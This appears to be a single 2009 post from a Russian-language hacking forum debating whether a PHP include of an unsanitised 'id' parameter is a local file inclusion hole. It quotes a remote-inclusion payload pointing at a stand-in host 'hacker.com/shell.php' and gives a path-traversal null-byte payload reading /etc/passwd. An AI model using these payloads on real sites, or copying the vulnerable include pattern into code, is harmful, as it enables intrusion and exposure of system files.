Показать сообщение отдельно

  #8  
Старый 23.04.2009, 19:35
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

2 DDoSька:

это врядли можно продемонстрировать полноценно, когда выложено только:

PHP код:
include("page".$GET['id'].".php"); 
Чтобы понять, что тут КОНКРЕТНЫЙ LFI, просто прочтите то, чему вы поверите:

http://forum.antichat.ru/thread23501.html

и не надо меня впредь просить искать уязвимость в коде:

PHP код:
$a $a+1
остальной код (скрытый) имеет значение, для демонстрации уязвимости, когда просят именно так - "нет ты скажи, как именно здесь можно всё похерить"

Цитата:
/index.php?page=http://hacker.com/shell.php).
В скрипте nilux`не проинклудилось бы
а я не говорил о RFI, тут LFI, что очень часто достаточно

т.е. например:

/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00 очень даже просто могло бы, при определенных обстоятельствах, дать свои плоды

Последний раз редактировалось Pashkela; 23.04.2009 в 19:38..
 
Ответить с цитированием